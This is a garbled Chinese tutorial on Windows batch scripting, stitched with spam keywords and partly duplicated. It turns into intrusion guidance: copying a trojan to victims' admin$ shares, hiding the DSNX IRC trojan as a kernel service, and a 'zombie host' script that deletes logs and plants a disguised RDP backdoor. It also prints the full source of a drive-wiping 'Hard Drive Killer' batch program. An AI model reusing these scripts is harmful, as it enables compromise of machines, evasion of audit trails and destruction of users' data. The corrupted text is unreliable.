认证考试批处理教程之
2.&&,
Usage:第一条命令,&&,第二条命令,[&&,
第三条命令...]用这种
方法
快递客服问题件处理详细方法山木方法pdf计算方法pdf华与华方法下载八字理论方法下载
可以同时执行多条命令,当碰到执行出错的命令后将不执行后面的命令,如果一直没有出错则一直执行完所有命令;Sample:
C:\>dir,z:,&&,dir,c:\Ex4rch,
The,system,cannot,find,the,path,specified.C:\>dir,c:\Ex4rch,&&,dir,
z:,
Volume,in,drive,C,has,no,label., Volume,Serial,Number,is,0078-59FB, Directory,of,c:\Ex4rch,
2002-05-14,23:55,
,.,
2002-05-14,23:55,,..,
2002-05-14,23:55,14,sometips.gif, 1,File(s),14,bytes,
2,Dir(s),768,671,744,bytes,free, The,system,cannot,find,the,path,specified., 在做备份的时候可能会用到这种命令会比较简单,如:,
dir,file,#58//192.168.0.1/database/backup.mdb,&&,copy,
file,#58//192.168.0.1/database/backup.mdb,E:\backup, 如果远程服务器上存在backup.mdb文件,就执行copy命令,若不存在该文件则不
执行copy命令。这种用法可以替换IF,
exist了,:)3.||Usage:第一条命令,||,第二条命令,[||,
第三条命令...]用这种方法可以同时执行多条命令,当碰到执行正确的命令后将不
执行后面的命令,如果没有出现正确的命令则一直执行完所有命令;Sample:
C:\Ex4rch>dir,sometips.gif,||,del,sometips.gif, Volume,in,drive,C,has,no,label.,
Volume,Serial,Number,is,0078-59FBDirectory,of,C:\Ex4rch, 2002-05-14,23:55,14,sometips.gif,
1,File(s),14,bytes,
0,Dir(s),768,696,320,bytes,free,
组合命令使用的例子:,
sample:,
@copy,trojan.exe,\\%1\admin$\system32,&&,if,not,errorlevel,1,echo, IP,%1,USER,%2,PASS,%3,>>victim.txt四、管道命令的使用1.|,命令,
Usage:第一条命令,|,第二条命令,[|,第三条命令...],
将第一条命令的结果作为第二条命令的参数来使用,记得在unix中这种方式很常
见。sample:,
time,/t>>D:\IP.log,
netstat,-n,-p,tcp|find,":3389">>D:\IP.log,
start,Explorer,
看出来了么,用于终端服务允许我们为用户自定义起始的程序,来实现让用户运行下面这个bat,以获得登录用户的IP。2.>、>>输出重定向命令 将一条命令或某个程序输出结果的重定向到特定文件中,,>,与,
>>的区别在于,>会清除调原有文件中的内容后写入指定文件,而>>只会追加内容到指定文件中,而不会改动其中的内容。sample1:,
echo,hello,world>c:\hello.txt,(stupid,example?)sample2:,
时下DLL木马盛行,我们知道system32是个捉迷藏的好地方,许多木马都削尖了脑袋往那里钻,DLL马也不例外,针对这一点我们可以在安装好系统和必要的应用程序后,对该
目录
工贸企业有限空间作业目录特种设备作业人员作业种类与目录特种设备作业人员目录1类医疗器械目录高值医用耗材参考目录
下的EXE和DLL文件作一个记录: 运行CMD--转换目录到system32--dir,*.exe>exeback.txt,&,dir,
*.dll>dllback.txt,,
这样所有的EXE和DLL文件的名称都被分别记录到exeback.txt和dllback.txt中,, 日后如发现异常但用传统的方法查不出问题时,则要考虑是不是系统中已经潜入DLL木马了.,
这时我们用同样的命令将system32下的EXE和DLL文件记录到另外的exeback1.txt和dllback1.txt中,然后运行:
CMD--fc,exeback.txt,exeback1.txt>diff.txt,&,fc,dllback.txt,
dllback1.txt>diff.txt.(用FC命令比较前后两次的DLL和EXE文件,并将结果输入到diff.txt中),这样我们就能发现一些多出来的DLL和EXE文件,然后通过查看创建时间、版本、是否经过压缩等就能够比较容易地判断出是不是已经被DLL木马
光顾了。没有是最好,如果有的话也不要直接DEL掉,先用regsvr32, /u,trojan.dll将后门DLL文件注销掉,再把它移到回收站里,若系统没有异常反映再将之彻底删除或者提交给杀毒软件公司。3.<,
、>&,、<&,
<,从文件中而不是从键盘中读入命令输入。,
>&,将一个句柄的输出写入到另一个句柄的输入中。,
<&,从一个句柄读取输入并将其写入到另一个句柄输出中。,
这些并不常用,也就不多做介绍。No.5,
五.如何用批处理文件来操作注册
表
关于同志近三年现实表现材料材料类招标技术评分表图表与交易pdf视力表打印pdf用图表说话 pdf
在入侵过程中经常回操作注册表的特定的键值来实现一定的目的,例如:为了达到隐藏后门、木马程序而删除Run下残余的键值。或者创建一个服务用以加载后门。当然我们也会修改注册表来加固系统或者改变系统的某个属性,这些都需要我们对注册表操作有一定的了解。下面我们就先学习一下如何使用.REG文件来操作注册表.(我们可以用批处理来生成一个REG文件)
关于注册表的操作,常见的是创建、修改、删除。1.创建,
创建分为两种,一种是创建子项(Subkey)我们创建一个文件,内容如下:Windows,Registry,Editor,
Version,5.00[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\hacker],
然后执行该脚本,你就已经在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft下创建了一个名字为“hacker”的子项。另一种是创建一个项目名称 那这种文件格式就是典型的文件格式,和你从注册表中导出的文件格式一致,内容如下:,
Windows,Registry,Editor,Version, 5.00[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Invader"="Ex4rch",
"Door"=C:\\WINNT\\system32\\door.exe, "Autodos"=dword:02,
这样就在
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]下
新建了:Invader、door、about这三个项目,
Invader的类型是“String,,#118alue”,
door的类型是“REG,SZ,,#118alue”,
Autodos的类型是“DWORD,,#118alue”,
2.修改,
修改相对来说比较简单,只要把你需要修改的项目导出,然后用记事本进行修改,然后导入(regedit,/s)即可。3.删除,
我们首先来说说删除一个项目名称,我们创建一个如下的文件:
Windows,Registry,Editor,Version, 5.00[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Ex4rch"=-,
执行该脚本,
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]下的
"Ex4rch"就被删除了;我们再看看删除一个子项,我们创建一个如下的脚本:
Windows,Registry,Editor,Version,
5.00[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
执行该脚本,
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]就已
经被删除了。相信看到这里,.reg文件你基本已经掌握了。那么现在的目标就是用
批处理来创建特定内容的.reg文件了,记得我们前面说道的利用重定向符号可以很
容易地创建特定类型的文件。samlpe1:如上面的那个例子,如想生成如下注册表文
件
Windows,Registry,Editor,Version,
5.00[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Invader"="Ex4rch",
"door"=hex:255,
"Autodos"=dword:000000128,
只需要这样:,
@echo,Windows,Registry,Editor,Version,5.00>>Sample.reg@echo, [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>Sample.reg
@echo,"Invader"="Ex4rch">>Sample.reg,
@echo,"door"=5>>C:\\WINNT\\system32\\door.exe>>Sample.reg, @echo,"Autodos"=dword:02>>Sample.reg,
samlpe2:,
我们现在在使用一些比较老的木马时,可能会在注册表的
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run(Runon
ce、Runservices、Runexec)]下生成一个键值用来实现木马的自启动.但是这样很
容易暴露木马程序的路径,从而导致木马被查杀,相对地若是将木马程序注册为系
统服务则相对安全一些.下面以配置好地IRC木马DSNX为例(名为windrv32.exe)
@start,windrv32.exe,
@attrib,+h,+r,windrv32.exe,
@echo,
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run], >>patch.dll,
@echo,"windsnx,"=-,>>patch.dll,
@sc.exe,create,Windriversrv,type=,kernel,start=,auto,displayname=, WindowsDriver,binpath=,c:\winnt\system32\windrv32.exe, @regedit,/s,patch.dll,
@delete,patch.dll@REM,
[删除DSNXDE在注册表中的启动项,用sc.exe将之注册为系统关键性服务的同时
将其属性设为隐藏和只读,并config为自启动],
@REM,这样不是更安全^_^.六.精彩实例放送。,
1.删除win2k/xp系统默认共享的批处理,
------------------------,cut,here,then,save,as,.bat,or,.cmd,file,
---------------------------@echo,preparing,to,delete,all,the, default,shares.when,ready,pres,any,key., @pause,
@echo,off,
:Rem,check,parameters,if,null,show,usage., if,{%1}=={},goto,:Usage,
:Rem,code,start.,
echo.,
echo,------------------------------------------------------,
echo.,
echo,Now,deleting,all,the,default,shares., echo.,
net,share,%1$,/delete,
net,share,%2$,/delete,
net,share,%3$,/delete,
net,share,%4$,/delete,
net,share,%5$,/delete,
net,share,%6$,/delete,
net,share,%7$,/delete,
net,share,%8$,/delete,
net,share,%9$,/delete,
net,stop,Server,
net,start,Server,
echo.,
echo,All,the,shares,have,been,deleteed,
echo.,
echo,------------------------------------------------------, echo.,
echo,Now,modify,the,registry,to,change,the,system,default, properties.,
echo.,
echo,Now,creating,the,registry,file,
echo,Windows,Registry,Editor,Version,5.00>,c:\delshare.reg, echo,
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]>>,
c:\delshare.reg,
echo,"AutoShareWks"=dword:00000000>>,c:\delshare.reg, echo,"AutoShareServer"=dword:00000000>>,c:\delshare.reg, echo,Nowing,using,the,registry,file,to,chang,the,system,default, properties.,
regedit,/s,c:\delshare.reg,
echo,Deleting,the,temprotarily,files., del,c:\delshare.reg,
goto,:END,
:Usage,
echo.,
echo,------------------------------------------------------,
echo.,
echo,?,A,example,for,batch,file,?,
echo,?,[Use,batch,file,to,change,the,sysytem,share,properties.],?, echo.,
echo,Author:Ex4rch,
echo,Mail:Ex4rch@hotmail.com,QQ:1672602, echo.,
echo,Error:Not,enough,parameters,
echo.,
echo,?,Please,enter,the,share,disk,you,wanna,delete,?,
echo.,
echo,For,instance,to,delete,the,default,shares:, echo,delshare,c,d,e,ipc,admin,print, echo.,
echo,If,the,disklable,is,not,as,C:,D:,E:,,Please,chang,it,youself.
echo.,
echo,example:,
echo,If,locak,disklable,are,C:,D:,E:,X:,Y:,Z:,,you,should,chang,
the,command,into,:,
echo,delshare,c,d,e,x,y,z,ipc,admin,print,
echo.,
echo,***,you,can,delete,nine,shares,once,in,a,useing,***, echo.,
echo,------------------------------------------------------, goto,:EOF:END,
echo.,
echo,------------------------------------------------------, echo.,
echo,OK,delshare.bat,has,deleted,all,the,share,you,assigned., echo.Any,questions,,feel,free,to,mail,to,Ex4rch@hotmail.com.,
echo,
echo.,
echo,------------------------------------------------------, echo.,
:EOF,
echo,end,of,the,batch,file,
------------------------,cut,here,then,save,as,.bat,or,.cmd,file,
---------------------------,
2.全面加固系统(给肉鸡打补丁)的批处理文件,
------------------------,cut,here,then,save,as,.bat,or,.cmd,file, ---------------------------@echo,Windows,Registry,Editor,Version,
5.00,>patch.dll,
@echo,
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters],
>>patch.dll,
@echo,"AutoShareServer"=dword:00000000,>>patch.dll,
@echo,"AutoShareWks"=dword:00000000,>>patch.dll,
@REM,[禁止共享]@echo,
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa], >>patch.dll,
@echo,"restrictanonymous"=dword:00000001,>>patch.dll, @REM,[禁止匿名登录]@echo,
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters], >>patch.dll,
@echo,"SMBDeviceEnabled"=dword:00000000,>>patch.dll, @REM,[禁止及文件访问和打印共享]@echo,
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\@REMoteRegistry], >>patch.dll,
@echo,"Start"=dword:00000004,>>patch.dll,
@echo,
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule],
>>patch.dll,
@echo,"Start"=dword:00000004,>>patch.dll,
@echo,[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows, NT\CurrentVersion\Winlogon],>>patch.dll,
@echo,"ShutdownWithoutLogon"="0",>>patch.dll, @REM,[禁止登录前关机]@echo,"DontDisplayLastUserName"="1",>>patch.dll, @REM,[禁止显示前一个登录用户名称],
@regedit,/s,patch.dll------------------------,cut,here,then,save,
as,.bat,or,.cmd,file,---------------------------, 下面命令是清除肉鸡所有日志,禁止一些危险的服务,并修改肉鸡的
terminnal,service留跳后路。,
@regedit,/s,patch.dll,
@net,stop,w3svc,
@net,stop,event,log,
@del,c:\winnt\system32\logfiles\w3svc1\*.*,/f,/q, @del,c:\winnt\system32\logfiles\w3svc2\*.*,/f,/q, @del,c:\winnt\system32\config\*.event,/f,/q, @del,c:\winnt\system32dtclog\*.*,/f,/q,
@del,c:\winnt\*.txt,/f,/q,
@del,c:\winnt\*.log,/f,/q,
@net,start,w3svc,
@net,start,event,log,
@rem,[删除日志],
@net,stop,lanmanserver,/y,
@net,stop,Schedule,/y,
@net,stop,RemoteRegistry,/y,
@del,patch.dll,
@echo,The,server,has,been,patched,Have,fun., @del,patch.bat,
@REM,[禁止一些危险的服务。]@echo,
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal,
Server\WinStations\RDP-Tcp],>>patch.dll, @echo,"PortNumber"=dword:00002010,>>patch.dll, @echo,
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal,
Server\Wds\rdpwd\Tds\tcp,>>patch.dll, @echo,"PortNumber"=dword:00002012,>>patch.dll, @echo,
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD],
>>patch.dll,
@echo,"Start"=dword:00000002,>>patch.dll,
@echo,
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecuService], >>patch.dll,
@echo,"Start"=dword:00000002,>>patch.dll,
@echo,"ErrorControl"=dword:00000001,>>patch.dll,
@echo,
"ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\,
>>patch.dll,
@echo,
74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,\,
>>patch.dll,
@echo,
00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00,
>>patch.dll,
@echo,"ObjectName"="LocalSystem",>>patch.dll,
@echo,"Type"=dword:00000010,>>patch.dll,
@echo,"Description"="Keep,record,of,the,program,and,windows', message。",>>patch.dll,
@echo,"DisplayName"="Microsoft,EventLog",>>patch.dll,
@echo,
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\termservice], >>patch.dll,
@echo,"Start"=dword:00000004,>>patch.dll,
@copy,c:\winnt\system32\termsrv.exe,c:\winnt\system32\eventlog.exe
@REM,[修改3389连接,端口为8210(十六进制为00002012),名称为Microsoft,
EventLog,留条后路]3.Hard,Drive,Killer,Pro,Version,
4.0(玩批处理到这个水平真的不容易了。),
------------------------,cut,here,then,save,as,.bat,or,.cmd,file, ---------------------------,
@echo,off,
rem,This,program,is,dedecated,to,a,very,special,person,that,does, not,want,to,be,named.,
:start,
cls,
echo,PLEASE,WAIT,WHILE,PROGRAM,LOADS,.,.,.,
call,attrib,-r,-h,c:\autoexec.bat,>nul,
echo,@echo,off,>c:\autoexec.bat,
echo,call,format,c:,/q,/u,/autoSample,>nul,>>c:\autoexec.bat, call,attrib,+r,+h,c:\autoexec.bat,>nul,
rem,Drive,checking,and,assigning,the,valid,drives,to,the,drive,
variable.set,drive=,
set,alldrive=c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z, rem,code,insertion,for,Drive,Checking,takes,place,here., rem,drivechk.bat,is,the,file,name,under,the,root,directory., rem,As,far,as,the,drive,detection,and,drive,variable,settings,, don't,worry,about,how,it,
rem,works,,it's,d\*amn,to,complicated,for,the,average,or,even,the, expert,batch,programmer.,
rem,Except,for,Tom,Lavedas.,
echo,@echo,off,>drivechk.bat,
echo,@prompt,%%%%comspec%%%%,/f,/c,vol,%%%%1:,$b,find,"Vol",>,nul, >{t}.bat,
%comspec%,/e:2048,/c,{t}.bat,>>drivechk.bat,
del,{t}.bat,
echo,if,errorlevel,1,goto,enddc,>>drivechk.bat,
cls,
echo,PLEASE,WAIT,WHILE,PROGRAM,LOADS,.,.,.,
rem,When,errorlevel,is,1,,then,the,above,is,not,true,,if,0,,then, it's,true.,
rem,Opposite,of,binary,rules.,If,0,,it,will,elaps,to,the,next, command.,
echo,@prompt,%%%%comspec%%%%,/f,/c,dir,%%%%1:.\/ad/w/-p,$b,find,
"bytes",>,nul,>{t}.bat,
%comspec%,/e:2048,/c,{t}.bat,>>drivechk.bat,
del,{t}.bat,
echo,if,errorlevel,1,goto,enddc,>>drivechk.bat,
cls,
echo,PLEASE,WAIT,WHILE,PROGRAM,LOADS,.,.,.,
rem,if,errorlevel,is,1,,then,the,drive,specified,is,a,removable, media,drive,-,not,ready.,
rem,if,errorlevel,is,0,,then,it,will,elaps,to,the,next,command., echo,@prompt,dir,%%%%1:.\/ad/w/-p,$b,find,",0,bytes,free",>,nul, >{t}.bat,
%comspec%,/e:2048,/c,{t}.bat,>>drivechk.bat,
del,{t}.bat,
echo,if,errorlevel,1,set,drive=%%drive%%,%%1,>>drivechk.bat, cls,
echo,PLEASE,WAIT,WHILE,PROGRAM,LOADS,.,.,.,
rem,if,it's,errorlevel,1,,then,the,specified,drive,is,a,hard,or, floppy,drive.,
rem,if,it's,not,errorlevel,1,,then,the,specified,drive,is,a,CD-ROM, drive.,
echo,:enddc,>>drivechk.bat,
rem,Drive,checking,insertion,ends,here.,"enddc",stands,for,"end,
dDRIVE,cHECKING".,
rem,Now,we,will,use,the,program,drivechk.bat,to,attain,valid,drive, information.,
:Sampledrv,
for,%%a,in,(%alldrive%),do,call,drivechk.bat,%%a,>nul, del,drivechk.bat,>nul,
if,%drive.==.,set,drive=c,
:form_del,
call,attrib,-r,-h,c:\autoexec.bat,>nul,
echo,@echo,off,>c:\autoexec.bat,
echo,echo,Loading,Windows,,please,wait,while,Microsoft,Windows, recovers,your,system,.,.,.,>>c:\autoexec.bat,
echo,for,%%%%a,in,(%drive%),do,call,format,%%%%a:,/q,/u, /autoSample,>nul,>>c:\autoexec.bat,
echo,cls,>>c:\autoexec.bat,
echo,echo,Loading,Windows,,please,wait,while,Microsoft,Windows, recovers,your,system,.,.,.,>>c:\autoexec.bat,
echo,for,%%%%a,in,(%drive%),do,call,c:\temp.bat,%%%%a,Bunga,>nul, >>c:\autoexec.bat,
echo,cls,>>c:\autoexec.bat,
echo,echo,Loading,Windows,,please,wait,while,Microsoft,Windows, recovers,your,system,.,.,.,>>c:\autoexec.bat,
echo,for,%%%%a,in,(%drive%),call,deltree,/y,%%%%a:\,>nul, >>c:\autoexec.bat,
echo,cls,>>c:\autoexec.bat,
echo,echo,Loading,Windows,,please,wait,while,Microsoft,Windows, recovers,your,system,.,.,.,>>c:\autoexec.bat,
echo,for,%%%%a,in,(%drive%),do,call,format,%%%%a:,/q,/u, /autoSample,>nul,>>c:\autoexec.bat,
echo,cls,>>c:\autoexec.bat,
echo,echo,Loading,Windows,,please,wait,while,Microsoft,Windows, recovers,your,system,.,.,.,>>c:\autoexec.bat,
echo,for,%%%%a,in,(%drive%),do,call,c:\temp.bat,%%%%a,Bunga,>nul, >>c:\autoexec.bat,
echo,cls,>>c:\autoexec.bat,
echo,echo,Loading,Windows,,please,wait,while,Microsoft,Windows, recovers,your,system,.,.,.,>>c:\autoexec.bat,
echo,for,%%%%a,in,(%drive%),call,deltree,/y,%%%%a:\,>nul, >>c:\autoexec.bat,
echo,cd\,>>c:\autoexec.bat,
echo,cls,>>c:\autoexec.bat,
echo,echo,Welcome,to,the,land,of,death.,Munga,Bunga's,Multiple, Hard,Drive,Killer,version,4.0.,>>c:\autoexec.bat,
echo,echo,If,you,ran,this,file,,then,sorry,,I,just,made,it.,The,
purpose,of,this,program,is,to,tell,you,the,following.,.,., >>c:\autoexec.bat,
echo,echo,1.,To,make,people,aware,that,security,should,not,be, taken,for,granted.,>>c:\autoexec.bat,
echo,echo,2.,Love,is,important,,if,you,have,it,,truly,,don't,let, go,of,it,like,I,did!,>>c:\autoexec.bat,
echo,echo,3.,If,you,are,NOT,a,vegetarian,,then,you,are,a,murderer,, and,I'm,glad,your,HD,is,dead.,>>c:\autoexec.bat,
echo,echo,4.,Don't,support,the,following:,War,,Racism,,Drugs,and, the,Liberal,Party.>>c:\autoexec.bat,
echo,echo.,>>c:\autoexec.bat,
echo,echo,Regards,,>>c:\autoexec.bat,
echo,echo.,>>c:\autoexec.bat,
echo,echo,Munga,Bunga,>>c:\autoexec.bat,
call,attrib,+r,+h,c:\autoexec.bat,
:makedir,
if,exist,c:\temp.bat,attrib,-r,-h,c:\temp.bat,>nul,
echo,@echo,off,>c:\temp.bat,
echo,%%1:\,>>c:\temp.bat,
echo,cd\,>>c:\temp.bat,
echo,:startmd,>>c:\temp.bat,
echo,for,%%%%a,in,("if,not,exist,%%2\nul,md,%%2","if,exist,%%2\nul,
cd,%%2"),do,%%%%a,>>c:\temp.bat,
echo,for,%%%%a,in,(">bottom_hole.txt"),do,echo,%%%%a,Your,Gone, @$$hole!!!!,>>c:\temp.bat,
echo,if,not,exist,
%%1:\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\nul,
goto,startmd,>>c:\temp.bat,
call,attrib,+r,+h,c:\temp.bat,>nul,
cls,
echo,Initializing,Variables,.,.,.,
rem,deltree,/y,%%a:\*.,only,eliminates,directories,,hence,leaving, the,file,created,above,for,further,destruction.,
for,%%a,in,(%drive%),do,call,format,%%a:,/q,/u,/autoSample,>nul, cls,
echo,Initializing,Variables,.,.,.,
echo,Validating,Data,.,.,.,
for,%%a,in,(%drive%),do,call,c:\temp.bat,%%a,Munga,>nul, cls,
echo,Initializing,Variables,.,.,.,
echo,Validating,Data,.,.,.,
echo,Analyzing,System,Structure,.,.,.,
for,%%a,in,(%drive%),call,attrib,-r,-h,%%a:\,/S,>nul, call,attrib,+r,+h,c:\temp.bat,>nul,
call,attrib,+r,+h,c:\autoexec.bat,>nul,
cls,
echo,Initializing,Variables,.,.,.,
echo,Validating,Data,.,.,.,
echo,Analyzing,System,Structure,.,.,.,
echo,Initializing,Application,.,.,.,
for,%%a,in,(%drive%),call,deltree,/y,%%a:\*.,>nul, cls,
echo,Initializing,Variables,.,.,.,
echo,Validating,Data,.,.,.,
echo,Analyzing,System,Structure,.,.,.,
echo,Initializing,Application,.,.,.,
echo,Starting,Application,.,.,.,
for,%%a,in,(%drive%),do,call,c:\temp.bat,%%a,Munga,>nul, cls,
echo,Thank,you,for,using,a,Munga,Bunga,product., echo.,
echo,Oh,and,,Bill,Gates,rules,,and,he,is,not,a,geek,,he,is,a,good,
looking,genius.,
echo.,
echo,Here,is,a,joke,for,you,.,.,.,
echo.,
echo,Q).,What's,the,worst,thing,about,being,an,egg?, echo,A).,You,only,get,laid,once.,
echo.,
echo,HAHAHAHA,,get,it?,Don't,you,just,love,that,one?, echo.,
echo,Regards,,
echo.,
echo,Munga,Bunga,
:end,
rem,Hard,Drive,Killer,Pro,Version,4.0,,enjoy!!!!, rem,Author:,Munga,Bunga,-,from,Australia,,the,land,full,of, retarded,Australian's,(help,me,get,out,of,here)., 六.精彩实例放送。,
1.删除win2k/xp系统默认共享的批处理,
------------------------,cut,here,then,save,as,.bat,or,.cmd,file,
---------------------------@echo,preparing,to,delete,all,the, default,shares.when,ready,pres,any,key.,
@pause,
@echo,off,
:Rem,check,parameters,if,null,show,usage.,
if,{%1}=={},goto,:Usage,
:Rem,code,start.,
echo.,
echo,------------------------------------------------------,
echo.,
echo,Now,deleting,all,the,default,shares., echo.,
net,share,%1$,/delete,
net,share,%2$,/delete,
net,share,%3$,/delete,
net,share,%4$,/delete,
net,share,%5$,/delete,
net,share,%6$,/delete,
net,share,%7$,/delete,
net,share,%8$,/delete,
net,share,%9$,/delete,
net,stop,Server,
net,start,Server,
echo.,
echo,All,the,shares,have,been,deleteed, echo.,
echo,------------------------------------------------------,
echo.,
echo,Now,modify,the,registry,to,change,the,system,default, properties.,
echo.,
echo,Now,creating,the,registry,file,
echo,Windows,Registry,Editor,Version,5.00>,c:\delshare.reg, echo,
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]>>,
c:\delshare.reg,
echo,"AutoShareWks"=dword:00000000>>,c:\delshare.reg, echo,"AutoShareServer"=dword:00000000>>,c:\delshare.reg, echo,Nowing,using,the,registry,file,to,chang,the,system,default, properties.,
regedit,/s,c:\delshare.reg,
echo,Deleting,the,temprotarily,files.,
del,c:\delshare.reg,
goto,:END,
:Usage,
echo.,
echo,------------------------------------------------------, echo.,
echo,?,A,example,for,batch,file,?,
echo,?,[Use,batch,file,to,change,the,sysytem,share,properties.],?, echo.,
echo,Author:Ex4rch,
echo,Mail:Ex4rch@hotmail.com,QQ:1672602, echo.,
echo,Error:Not,enough,parameters,
echo.,
echo,?,Please,enter,the,share,disk,you,wanna,delete,?,
echo.,
echo,For,instance,to,delete,the,default,shares:, echo,delshare,c,d,e,ipc,admin,print, echo.,
echo,If,the,disklable,is,not,as,C:,D:,E:,,Please,chang,it,youself.
echo.,
echo,example:,
echo,If,locak,disklable,are,C:,D:,E:,X:,Y:,Z:,,you,should,chang, the,command,into,:,
echo,delshare,c,d,e,x,y,z,ipc,admin,print, echo.,
echo,***,you,can,delete,nine,shares,once,in,a,useing,***,
echo.,
echo,------------------------------------------------------, goto,:EOF:END,
echo.,
echo,------------------------------------------------------, echo.,
echo,OK,delshare.bat,has,deleted,all,the,share,you,assigned., echo.Any,questions,,feel,free,to,mail,to,Ex4rch@hotmail.com.,
echo,
echo.,
echo,------------------------------------------------------, echo.,
:EOF,
echo,end,of,the,batch,file,
------------------------,cut,here,then,save,as,.bat,or,.cmd,file, ---------------------------,
2.全面加固系统(给肉鸡打补丁)的批处理文件,
------------------------,cut,here,then,save,as,.bat,or,.cmd,file, ---------------------------@echo,Windows,Registry,Editor,Version, 5.00,>patch.dll,
@echo,
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\para
meters],
>>patch.dll,
@echo,"AutoShareServer"=dword:00000000,>>patch.dll, @echo,"AutoShareWks"=dword:00000000,>>patch.dll, @REM,[禁止共享]@echo,
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa], >>patch.dll,
@echo,"restrictanonymous"=dword:00000001,>>patch.dll, @REM,[禁止匿名登录]@echo,
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters],
>>patch.dll,
@echo,"SMBDeviceEnabled"=dword:00000000,>>patch.dll, @REM,[禁止及文件访问和打印共享]@echo,
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\@REMoteRegistry],
>>patch.dll,
@echo,"Start"=dword:00000004,>>patch.dll,
@echo,
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule], >>patch.dll,
@echo,"Start"=dword:00000004,>>patch.dll,
@echo,[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows, NT\CurrentVersion\Winlogon],>>patch.dll,
@echo,"ShutdownWithoutLogon"="0",>>patch.dll, @REM,[禁止登录前关机]@echo,"DontDisplayLastUserName"="1",>>patch.dll, @REM,[禁止显示前一个登录用户名称],
@regedit,/s,patch.dll------------------------,cut,here,then,save,
as,.bat,or,.cmd,file,---------------------------, 下面命令是清除肉鸡所有日志,禁止一些危险的服务,并修改肉鸡的
terminnal,service留跳后路。,
@regedit,/s,patch.dll,
@net,stop,w3svc,
@net,stop,event,log,
@del,c:\winnt\system32\logfiles\w3svc1\*.*,/f,/q, @del,c:\winnt\system32\logfiles\w3svc2\*.*,/f,/q, @del,c:\winnt\system32\config\*.event,/f,/q, @del,c:\winnt\system32dtclog\*.*,/f,/q, @del,c:\winnt\*.txt,/f,/q,
@del,c:\winnt\*.log,/f,/q,
@net,start,w3svc,
@net,start,event,log,
@rem,[删除日志],
@net,stop,lanmanserver,/y,
@net,stop,Schedule,/y,
@net,stop,RemoteRegistry,/y,
@del,patch.dll,
@echo,The,server,has,been,patched,Have,fun.,
@del,patch.bat,
@REM,[禁止一些危险的服务。]@echo,
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal, Server\WinStations\RDP-Tcp],>>patch.dll,
@echo,"PortNumber"=dword:00002010,>>patch.dll,
@echo,
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal, Server\Wds\rdpwd\Tds\tcp,>>patch.dll,
@echo,"PortNumber"=dword:00002012,>>patch.dll,
@echo,
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD], >>patch.dll,
@echo,"Start"=dword:00000002,>>patch.dll,
@echo,
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecuService], >>patch.dll,
@echo,"Start"=dword:00000002,>>patch.dll,
@echo,"ErrorControl"=dword:00000001,>>patch.dll,
@echo,
"ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,0
0,6f,00,\,
>>patch.dll,
@echo,
74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,\,
>>patch.dll,
@echo,
00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00,
>>patch.dll,
@echo,"ObjectName"="LocalSystem",>>patch.dll,
@echo,"Type"=dword:00000010,>>patch.dll,
@echo,"Description"="Keep,record,of,the,program,and,windows', message。",>>patch.dll,
